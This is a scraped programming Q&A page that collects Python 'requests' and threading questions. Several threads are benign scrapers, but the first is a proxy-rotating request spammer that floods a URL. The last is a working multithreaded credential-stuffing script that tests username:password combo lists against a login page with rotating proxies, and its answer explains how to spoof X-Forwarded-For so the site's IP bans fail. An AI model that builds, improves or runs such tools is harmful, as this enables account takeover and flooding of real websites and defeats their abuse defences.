How would I handle the multithreading better on my request spammer

How would I handle the multithreading better on my request spammer - python

I have a little python script for spamming requests to a URL using Requests, It uses proxies so the IPs are random, I have a text folder called https.txt that has over two thousand proxies that I've gotten.
I attempted to multithread the program, but I feel like what I'm doing isn't exactly ideal for what I'm doing. If I could get any advice on how to improve this, that would be much appreciated
from colorama import Fore, Back, Style, init
import requests
import threading
init()
# constant vars
link = "" # URL goes here
agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"
referer = ""
proxies = open("https.txt", "r")
# dynamic vars
threadLock = threading.Lock()
threads = []
num = 0
class myThread (threading.Thread):
def __init__(self, threadID, name, counter, proxy):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
self.proxy = proxy
def run(self):
# print("Starting " + self.name)
spam(self.name, proxy)
# Each thread runs this function once
def spam(threadName, proxy):
try:
headers = {
"user-agent": agent,
"referer": referer
}
req = requests.get(url=link, headers=headers, proxies=proxy, timeout=100)
status = req.status_code
req.close()
if status == 200:
print(Fore.CYAN + threadName + ": Working request with proxy: " + Fore.YELLOW + x.strip())
else:
print(Fore.GREEN + threadName + ": Connection Code Status Error:", status)
except IOError :
print(Fore.RED + threadName + ": Connection error - Bad Proxy")
for x in proxies:
thread = str(num)
num = num + 1
proxy = {
"https": x.strip()
}
thread = myThread(thread, "Thread-" + thread, num, proxy)
thread.start()
# Wait for all threads to complete
for t in threads:
t.join()

Related

python django, How to prohibit go to the next code from for loop

def redirectTest(item):
try:
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
}
r = None
try:
r = requests.head(item, allow_redirects=False, headers=headers)
except Exception as e:
print(e)
if r is not None:
if r.status_code == 301:
print("Tested: " + str(r.status_code))
elif r.status_code == 302:
print("Tested: " + str(r.status_code))
else:
print("Tested: " + str(r.status_code))
except requests.exceptions.RequestException as e:
print('error: ' + e)
return
#ensure_csrf_cookie
def re_check_url(request):
if request.method == "POST":
if request.is_ajax():
resolved_urls = ['twitch.tv/yumyumyu77']
scheme_list = ['http://www.', 'http://', 'https://www.', 'https://']
for item in resolved_urls:
for scheme_item in scheme_list:
redirectTest(scheme_item + item)
return JsonResponse({'res': 1})
return JsonResponse({'res': 2})
This code checks scheme + some url's responses.
But when I execute the code, my Django terminal prints:
r_status_code: 301
r_status_code: 301
r_status_code: 200
[22/Oct/2018 23:54:49] "POST /re/check/url/ HTTP/1.1" 200 10
r_status_code: 301
Problem:
I think it means that return JsonResponse({'res': 1}) this line is ahead, and print("Tested: " + str(r.status_code)) this line is after or later.
Sometimes it prints ordinarily, but sometimes it prints abnormally.
Question:
I learned that Python code is executed line by lines from top to bottom, but It seems like it is not doing so.
Why does this happened? and how can I fix it?
It's executing order is not what I expected.
Edit:
I tried to use Lock()
for item in resolved_urls:
for scheme_item in scheme_list:
from threading import Lock
_lock = Lock()
with _lock:
redirectTest(scheme_item + item)
But It does not seems to be working well.

Everything is actually working correctly. 200 is success, and it redirects to the success page. Then it runs your last loop.

Python - Can't Get Counter To Work in Multiprocessing Environment (Pool, Map)

I need the counter variable (list_counter) inside my 'scraper' function to increment for each iteration through list1.
The problem is it's assigning a counter to each individual process.
I want each process to simply increment the global list_counter at the end of the loop, not for each process to have its own counter.
I tried passing the variable as an argument but couldn't get it to work that way either.
What you guys think? Is it even possible to have a global counter work with multiple processes - specifically using pool, map, lock?
from multiprocessing import Lock, Pool
from time import sleep
from bs4 import BeautifulSoup
import re
import requests
exceptions = []
lock = Lock()
list_counter = 0
def scraper(url): # url is tied to the individual list items
"""
Testing multiprocessing and requests
"""
global list_counter
lock.acquire()
try:
scrape = requests.get(url,
headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"},
timeout=10)
if scrape.status_code == 200:
""" --------------------------------------------- """
# ---------------------------------------------------
''' --> SCRAPE ALEXA RANK: <-- '''
# ---------------------------------------------------
""" --------------------------------------------- """
sleep(0.1)
scrape = requests.get("http://data.alexa.com/data?cli=10&dat=s&url=" + url,
headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"})
html = scrape.content
soup = BeautifulSoup(html, 'lxml')
rank = re.findall(r'<popularity[^>]*text="(\d+)"', str(soup))
print("Server Status:", scrape.status_code, '-', u"\u2713", '-', list_counter, '-', url, '-', "Rank:", rank[0])
list_counter = list_counter + 1
else:
print("Server Status:", scrape.status_code)
list_counter = list_counter + 1
print(list_counter)
pass
except BaseException as e:
exceptions.append(e)
print()
print(e)
print()
list_counter = list_counter + 1
print(list_counter)
pass
finally:
lock.release()
if __name__ == '__main__':
list1 = ["http://www.wallstreetinvestorplace.com/2018/04/cvs-health-corporation-cvs-to-touch-7-54-earnings-growth-for-next-year/",
"https://macondaily.com/2018/04/06/cetera-advisors-llc-lowers-position-in-cvs-health-cvs.html",
"http://www.thesportsbank.net/football/liverpool/jurgen-klopp-very-positive-about-mo-salah-injury/",
"https://www.moneyjournals.com/trump-wasting-time-trying-bring-amazon/",
"https://www.pmnewsnigeria.com/2018/04/06/fcta-targets-800000-children-for-polio-immunisation/",
"http://toronto.citynews.ca/2018/04/06/officials-in-canada-braced-for-another-spike-in-illegal-border-crossings/",
"https://www.pmnewsnigeria.com/2018/04/04/pdp-describes-looters-list-as-plot-to-divert-attention/",
"https://beyondpesticides.org/dailynewsblog/2018/04/epa-administrator-pruitt-colluding-regulated-industry/",
"http://thyblackman.com/2018/04/06/robert-mueller-is-searching-for/",
"https://www.theroar.com.au/2018/04/06/2018-commonwealth-games-swimming-night-2-finals-live-updates-results-blog/",
"https://medicalresearch.com/pain-research/migraine-linked-to-increased-risk-of-heart-disease-and-stroke/40858/",
"http://www.investingbizz.com/2018/04/amazon-com-inc-amzn-stock-creates-investors-concerns/",
"https://stocknewstimes.com/2018/04/06/convergence-investment-partners-llc-grows-position-in-amazon-com-inc-amzn.html",
"https://factsherald.com/old-food-rules-needs-to-be-updated/",
"https://www.nextadvisor.com/blog/2018/04/06/the-facebook-scandal-evolves/",
"http://sacramento.cbslocal.com/2018/04/04/police-family-youtube-shooter/",
"http://en.brinkwire.com/245768/why-does-stress-lead-to-weight-gain-study-sheds-light/",
"https://www.marijuana.com/news/2018/04/monterey-bud-jeff-sessions-is-on-the-wrong-side-of-history-science-and-public-opinion/",
"http://www.stocksgallery.com/2018/04/06/jpmorgan-chase-co-jpm-noted-a-price-change-of-0-80-and-amazon-com-inc-amzn-closes-with-a-move-of-2-92/",
"https://stocknewstimes.com/2018/04/06/front-barnett-associates-llc-has-2-41-million-position-in-cvs-health-corp-cvs.html",
"http://www.liveinsurancenews.com/colorado-mental-health-insurance-bill-to-help-consumers-navigate-the-system/",
"http://newyork.cbslocal.com/2018/04/04/youtube-headquarters-shooting-suspect/",
"https://ledgergazette.com/2018/04/06/liberty-interactive-co-series-a-liberty-ventures-lvnta-shares-bought-by-brandywine-global-investment-management-llc.html",
"http://bangaloreweekly.com/2018-04-06-city-holding-co-invests-in-cvs-health-corporation-cvs-shares/",
"https://www.thenewsguru.com/didnt-know-lawyer-paid-prostitute-130000-donald-trump/",
"http://www.westlondonsport.com/chelsea/football-wls-conte-gives-two-main-reasons-chelseas-loss-tottenham",
"https://registrarjournal.com/2018/04/06/amazon-com-inc-amzn-shares-bought-by-lenox-wealth-management-inc.html",
"http://www.businessdayonline.com/1bn-eca-withdrawal-commence-action-president-buhari-pdp-tasks-nass/",
"http://www.thesportsbank.net/football/manchester-united/pep-guardiola-asks-for-his-fans-help-vs-united-in-manchester-derby/",
"https://www.pakistantoday.com.pk/2018/04/06/three-palestinians-martyred-as-new-clashes-erupt-along-gaza-border/",
"http://www.nasdaqfortune.com/2018/04/06/risky-factor-of-cvs-health-corporation-cvs-is-observed-at-1-03/",
"https://stocknewstimes.com/2018/04/06/cetera-advisor-networks-llc-decreases-position-in-cvs-health-cvs.html",
"http://nasdaqjournal.com/index.php/2018/04/06/planet-fitness-inc-nyseplnt-do-analysts-think-you-should-buy/",
"http://www.tv360nigeria.com/apc-to-hold-national-congress/",
"https://www.pmnewsnigeria.com/2018/04/03/apc-governors-keep-sealed-lips-after-meeting-with-buhari/",
"https://www.healththoroughfare.com/diet/healthy-lifestyle-best-foods-you-should-eat-for-weight-loss/7061",
"https://stocknewstimes.com/2018/04/05/amazon-com-inc-amzn-shares-bought-by-west-oak-capital-llc.html",
"http://www.current-movie-reviews.com/48428/dr-oz-could-you-be-a-victim-of-sexual-assault-while-on-vacation/",
"https://www.brecorder.com/2018/04/07/410124/world-health-day-to-be-observed-on-april-7/",
"http://www.coloradoindependent.com/169637/trump-pruitt-emissions-epa-pollution",
"https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/",
"http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/"]
p = Pool(15) # thread count
p.map(scraper, list1) # (function, iterable)
p.terminate()
p.join()

You can use concurrent.futures
import concurrent.futures
import urllib.request
from time import sleep
from bs4 import BeautifulSoup
import re
import requests
def scraper(url):
list_counter = 0
try:
scrape = requests.get(url,
headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"},
timeout=10)
if scrape.status_code == 200:
sleep(0.1)
scrape = requests.get("http://data.alexa.com/data?cli=10&dat=s&url=" + url,
headers={"user-agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"})
html = scrape.content
soup = BeautifulSoup(html, 'lxml')
rank = re.findall(r'<popularity[^>]*text="(\d+)"', str(soup))
print("Server Status:", scrape.status_code, '-', u"\u2713", '-', list_counter, '-', url, '-', "Rank:", rank[0])
list_counter = list_counter + 1
else:
print("Server Status:", scrape.status_code)
list_counter = list_counter + 1
print(list_counter)
pass
except BaseException as e:
exceptions.append(e)
print()
print(e)
print()
list_counter = list_counter + 1
print(list_counter)
pass
def load_url(url, timeout):
with urllib.request.urlopen(url, timeout=timeout) as conn:
return conn.read()
list1 copy your list here(in order to save space)
with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor:
future_to_url = {executor.submit(load_url, url, 50): url for url in list1}
for future in concurrent.futures.as_completed(future_to_url):
url = future_to_url[future]
try:
data = future.result()
except Exception as exc:
print('%r generated an exception: %s' % (url, exc))
else:
print('%r page is %d bytes' % (url, len(data)))
with concurrent.futures.ProcessPoolExecutor() as executor:
for n, p in zip(list1, executor.map(scraper, list1)):
print(n, p)
You will get output(just a few lines)
http://www.coloradoindependent.com/169637/trump-pruitt-emissions-epa-pollution None
Server Status: 200 - ✓ - 0 - https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/ - Rank: 381576
https://thecrimereport.org/2018/04/05/will-sessions-new-justice-strategy-turn-the-clock-back-on-civil-rights/ None
Server Status: 200 - ✓ - 0 - http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/ - Rank: 152818
http://en.brinkwire.com/245490/pasta-unlikely-to-cause-weight-gain-as-part-of-a-healthy-diet/ None

Process do not share memory between them. But you can use Manager of the multiprocessing module so the process can manipulate the same object:
manager = multiprocessing.Manager()
list_counter = manager.list()
You will have to pass the list_counter to the scraper function.
Note the list created by the manager is thread/process safe.

Python2 BeautifulSoup returns Blank output

This is the code I am using for downloading the images from Google page. This code is taking time in Evaluating and downloading the images. Hence, I thought of using the Beautifulsoup Library for faster evaluation and download. Check the below original code:
import time
import sys
import os
import urllib2
search_keyword = ['Australia']
keywords = [' high resolution']
def download_page(url):
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1:
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+1)
end_content = s.find(',"ow"',start_content+1)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item)
time.sleep(0.1)
page = page[end_content:]
return items
t0 = time.time()
i= 0
while i<len(search_keyword):
items = []
iteration = "Item no.: " + str(i+1) + " -->" + " Item name = " + str(search_keyword[i])
print (iteration)
print ("Evaluating...")
search_keywords = search_keyword[i]
search = search_keywords.replace(' ','%20')
try:
os.makedirs(search_keywords)
except OSError, e:
if e.errno != 17:
raise
pass
j = 0
while j<len(keywords):
pure_keyword = keywords[j].replace(' ','%20')
url = 'https://www.google.com/search?q=' + search + pure_keyword + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
raw_html = (download_page(url))
time.sleep(0.1)
items = items + (_images_get_all_items(raw_html))
j = j + 1
print ("Total Image Links = "+str(len(items)))
print ("\n")
info = open('output.txt', 'a')
info.write(str(i) + ': ' + str(search_keyword[i-1]) + ": " + str(items) + "\n\n\n")
info.close()
t1 = time.time()
total_time = t1-t0
print("Total time taken: "+str(total_time)+" Seconds")
print ("Starting Download...")
k=0
errorCount=0
while(k<len(items)):
from urllib2 import Request,urlopen
from urllib2 import URLError, HTTPError
try:
req = Request(items[k], headers={"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req,None,15)
output_file = open(search_keywords+"/"+str(k+1)+".jpg",'wb')
data = response.read()
output_file.write(data)
response.close();
print("completed ====> "+str(k+1))
k=k+1;
except IOError:
errorCount+=1
print("IOError on image "+str(k+1))
k=k+1;
except HTTPError as e:
errorCount+=1
print("HTTPError"+str(k))
k=k+1;
except URLError as e:
errorCount+=1
print("URLError "+str(k))
k=k+1;
i = i+1
print("\n")
print("Everything downloaded!")
print("\n"+str(errorCount)+" ----> total Errors")
I thought editing the below code, will help in making the code work with BeautifulSoup Library and my work will be completed faster:
def download_page(url):
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
#response = urllib2.urlopen(req)
#page = response.read()
return BeautifulSoup(urlopen(Request(req)), 'html.parser')
except:
return"Page Not found"
But the above code is returning blank. Kindly, let me know what I might do to make the code work excellently well with BeautifulSoup without any trouble.

You can't just pass Google headers like that. The search engine is ALOT more complex than simply substituting some keywords into a GET URL.
HTML is a markup language only useful for one way rendering of human readable information. For your application, you need machine readable markup rather than trying to decipher human readable text. Google already has a very comprehensive API https://developers.google.com/custom-search/ which is easy to use, and a much better way of achieving this than using BeautifulSoup

the downloaded image's content-length is zero

I use python to download images from some website, some times the image's content-length is zero. The image can be accessed normally in web browser.
I have tried three methodes, and get the same result, so how to resolve this problem?
# -*- coding: utf-8 -*-
"""
Created on Wed Sep 20 13:51:42 2017
"""
import urllib
import urllib2
import re
import uuid
import os
import requests
from lxml import etree
from multiprocessing import Pool
url = 'https://www.sina.com.cn/'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'
request = urllib2.Request(url)
request.add_header('User-Agent', user_agent)
response = urllib2.urlopen(request)
content = response.read()
tree=etree.HTML(content, parser=etree.HTMLParser(encoding='utf-8'))
node=tree.xpath("//img/#src")
dic1={}
dic2={}
localPath='E:\\pictures\\'
def generateFileName():
return str(uuid.uuid1())
def createFileWithFileName(localPathParam,fileName):
totalPath=localPathParam+'\\'+fileName
if not os.path.exists(totalPath):
file=open(totalPath,'wb')
file.close()
return totalPath
def worker(i):
path = node[i]
if not (dic1.has_key(path)):
dic1[path] = 1
index = path.rfind('/')
suffix = path[index+1:]
filename = suffix
#filename = generateFileName()+'.'+suffix
if(re.search(r'^(https?:)?\/\/', path)):
#print('save picture %s as %s' % (path,filename))
'''
#this code get the same result too
try:
urllib.urlretrieve(path, createFileWithFileName(localPath, filename))
except Exception, ex:
print(ex.message)
'''
with open(localPath + filename, 'wb') as handle:
response = requests.get(path, timeout=60)
if not response.ok:
print response
else:
print 'wrong when get ' + path
for block in response.iter_content(1024):
if not block:
break
handle.write(block)
'''
#this code get the same result too
try:
req = urllib2.Request(path)
req.add_header('User-Agent', user_agent)
picture = urllib2.urlopen(url=path, timeout=5).read()
document = open(localPath+filename,'wb')
document.write(picture)
document.close()
except Exception, ex:
print(ex.message)
'''
if __name__=='__main__':
p = Pool()
for i in range(len(node)):
p.apply_async(worker, args=(i,))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
print 'All subprocesses done.'

Sending Asynchronous requests with Python requests library

As a part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that I've come up with following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
return {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
'X-Requested-With': 'XMLHttpRequest',
'Referer': 'https://www.example.com/'
}
def make_requests():
global user_queue
while True:
uname_pass = user_queue.get().split(':')
status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
if status == 1:
hits.put(uname_pass)
stats['hits'] += 1
if status == 0:
stats['fake'] += 1
if status == -1:
user_queue.put(':'.join(uname_pass))
stats['IP Banned'] += 1
if status == -2:
stats['Exception'] += 1
user_queue.task_done()
def get_status(uname, password):
global proxy_queue
try:
if proxy_queue.empty():
print 'Reloaded proxies, sleeping for 2 mins'
sleep(120)
session = requests.session()
proxy = 'http://' + proxy_queue.get()
login_url = 'http://example.com/login'
header = get_default_header()
header['X-Forwarded-For'] = '8.8.8.8'
login_page = session.get(
login_url,
headers=header,
proxies={
'http':proxy
}
)
tree = html.fromstring(login_page.text)
csrf = list(set(tree.xpath("//input[#name='csrfmiddlewaretoken']/#value")))[0]
payload = {
'email': uname,
'password': password,
'csrfmiddlewaretoken': csrf,
}
result = session.post(
login_url,
data=payload,
headers=header,
proxies={
'http':proxy
}
)
if result.status_code == 200:
if 'access_token' in session.cookies:
return 1
elif 'Please check your email and password.' in result.text:
return 0
else:
# IP banned
return -1
else:
# IP banned
return -1
except Exception as e:
print e
return -2
def populate_proxies():
global proxy_queue
proxy_queue = Queue()
with open('nice_proxy.txt', 'r') as f:
for line in f.readlines():
proxy_queue.put(line.replace('\n', ''))
def hit_printer():
while True:
sleep(5)
print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
global user_queue
global proxy_queue
global stats
global start_time
stats = dict()
stats['hits'] = 0
stats['fake'] = 0
stats['IP Banned'] = 0
stats['Exception'] = 0
threads = 200
hits = Queue()
uname_password_file = '287_uname_pass.txt'
populate_proxies()
user_queue = Queue(threads)
for i in range(threads):
t = Thread(target=make_requests)
t.daemon = True
t.start()
hit_printer = Thread(target=hit_printer)
hit_printer.daemon = True
hit_printer.start()
start_time = time.time()
try:
count = 0
with open(uname_password_file, 'r') as f:
for line in f.readlines():
count += 1
if count > 2000:
break
user_queue.put(line.replace('\n', ''))
user_queue.join()
print '####################Result#####################'
while not hits.empty():
print hits.get()
ttr = round(time.time() - start_time, 3)
print 'Time required: ' + str(ttr)
print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
except Exception as e:
print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned, and it stops working. Since I'm disposing off the proxy after I use it, it shouldn't be the case. So I believe it might be due to one of the following
In an attempt to make multiple requests using multiple sessions, it's somehow failing to maintain disparateness for not supporting asynchronicity.
The victim site bans IPs based on its groups e.g., Banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs
The victim site is using headers like 'X-Forwarded-for', 'Client-IP', 'Via', or a similar header to detect the originating IP. But it seems unlikely because I can log in via by browser, without any proxy, and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure weather I'm making an error in the threading part or the requests part, any help is appreciated.

I have figured out what the problem was, thanks to #Martijn Pieters, as usual, he's a life saver.
I was using elite level proxies and there was no way the victim site could have found my IP address, however, it was using X-Forwarded-For to detect my root IP address.
Since elite level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was using the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address everytime a requests is made which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

How would I handle the multithreading better on my request spammer - python

Related

python django, How to prohibit go to the next code from for loop

Python - Can't Get Counter To Work in Multiprocessing Environment (Pool, Map)

Python2 BeautifulSoup returns Blank output

the downloaded image's content-length is zero

Sending Asynchronous requests with Python requests library

Categories

Resources